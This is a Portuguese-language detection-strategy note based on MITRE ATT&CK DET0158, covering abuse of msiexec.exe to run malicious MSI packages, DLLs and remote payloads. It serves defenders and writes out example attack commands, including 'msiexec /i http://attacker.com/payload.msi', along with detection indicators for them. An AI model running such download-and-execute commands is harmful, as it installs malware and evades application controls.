det0158-detection-of-msiexec-abuse-for-local-network-and-dll-execution

# DET0158 — Detection of Msiexec Abuse for Local, Network, and DLL Execution ## Descrição Esta estratégia detecta o abuso do `msiexec.exe` como proxy de execução (T1218.007) para carregar e executar payloads maliciosos em formatos MSI, DLL ou remotos. Como binário assinado pela Microsoft presente em todos os sistemas Windows, `msiexec.exe` é frequentemente permitido por políticas de execução e pode ser usado para carregar código arbitrário contornando AppLocker e outros controles de aplicação. Os vetores incluem: `msiexec /i malicious.msi` para instaladores MSI trojanizados, `msiexec /z malicious.dll` para carregar DLL maliciosa via callback de instalação, e `msiexec /i http://attacker.com/payload.msi` para instalação remota de payload — este último é especialmente perigoso pois busca e executa em uma única linha de comando. Grupos como Lazarus e operadores de ransomware utilizam este vetor para download-and-execute furtivo. A telemetria inclui Sysmon Event ID 1 para linhas de comando de `msiexec.exe` com parâmetros suspeitos (URL HTTP/HTTPS, DLL via `/z` ou `/y`, ou arquivo MSI em caminhos de usuário), Event ID 3 para conexões de rede por `msiexec.exe`, e Event ID 11 para arquivos temporários criados durante instalação anômala. `msiexec.exe` fazendo conexão de rede é altamente suspeito em contexto não-administrativo. ## Indicadores de Detecção - `msiexec /i http://` ou `msiexec /i https://` — carregamento remoto de MSI - `msiexec /z <caminho_dll>` ou `msiexec /y <caminho_dll>` com DLL em caminho não-sistema - `msiexec.exe` gerando conexão de rede (Sysmon Event ID 3) em contexto não-deployment - Arquivo MSI em `%TEMP%` ou `%APPDATA%` executado via `msiexec /i` - `msiexec.exe` como processo filho de `cmd.exe`, PowerShell, ou processo de Office ## Técnicas Relacionadas - [[t1218-system-binary-proxy-execution|T1218 — System Binary Proxy Execution]] - [[t1059-command-and-scripting-interpreter|T1059 — Command and Scripting Interpreter]] - [[t1105-ingress-tool-transfer|T1105 — Ingress Tool Transfer]] - [[t1574-hijack-execution-flow|T1574 — Hijack Execution Flow]] ## Analytics Relacionadas - [[an0445-analytic-0445|AN0445 — Analytic 0445]] --- *Fonte: [MITRE ATT&CK — DET0158](https://attack.mitre.org/detectionstrategies/DET0158)*